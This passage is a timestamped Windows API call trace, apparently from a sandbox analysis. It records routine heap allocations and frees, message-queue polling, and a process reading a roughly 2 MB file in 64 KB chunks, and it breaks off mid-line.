RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0204.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0204.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0204.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0204.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0204.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0204.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0204.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0204.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0204.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0204.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0204.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0204.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0204.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0204.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0204.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff78 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6590 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65d8 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0204.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffeb0 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0204.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0204.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6710 [0204.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0204.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0204.582] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.582] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df7b0 | out: lpNewFilePointer=0x0) returned 1 [0204.582] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.582] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df7b0 | out: lpNewFilePointer=0x0) returned 1 [0204.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x203720) returned 0xa0d020 [0204.592] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df7c8 | out: lpNewFilePointer=0x0) returned 1 [0204.592] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.598] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.601] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.603] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.606] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.683] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.686] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.688] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.691] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.695] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.698] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.700] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.743] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.747] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.751] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.769] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.838] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.906] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.909] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.912] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.914] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.917] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.919] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.922] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.965] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.968] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.970] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.971] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.973] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.976] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.979] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.980] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x10000, lpOverlapped=0x0) returned 1 [0204.982] ReadFile (in: hFile=0x2ac, lpBuffer=0x14bffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df7f0, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesRead=0x7df7f0*=0x3720, lpOverlapped=0x0) returned 1 [0204.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0204.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0204.997] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6710 | out: hHeap=0x12c0000) returned 1 [0204.997] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe40 [0204.997] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x203720) returned 0x16ca020 [0205.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0xa0d020 | out: hHeap=0x12c0000) returned 1 [0205.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0205.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffeb0 | out: hHeap=0x12c0000) returned 1 [0205.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff00 [0205.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6680 [0205.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0205.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001d0 [0205.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0205.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0205.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0205.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0205.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0205.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6668 [0205.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.136] GetLastError () returned 0x0 [0205.136] SetLastError (dwErrCode=0x0) [0205.137] GetLastError () returned 0x0 [0205.137] SetLastError (dwErrCode=0x0) [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6758 | out: hHeap=0x12c0000) returned 1 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6668 | out: hHeap=0x12c0000) returned 1 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001d0 | out: hHeap=0x12c0000) returned 1 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0205.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0205.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6680 | out: hHeap=0x12c0000) returned 1 [0205.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff00 | out: hHeap=0x12c0000) returned 1 [0205.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x203728) returned 0xa03020 [0205.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x16ca020 | out: hHeap=0x12c0000) returned 1 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300220 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe50 [0205.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13023e0 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6668 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0205.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0205.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0205.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0205.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff28 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff28 | out: hHeap=0x12c0000) returned 1 [0205.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6500 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6500 | out: hHeap=0x12c0000) returned 1 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001f8 | out: hHeap=0x12c0000) returned 1 [0205.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 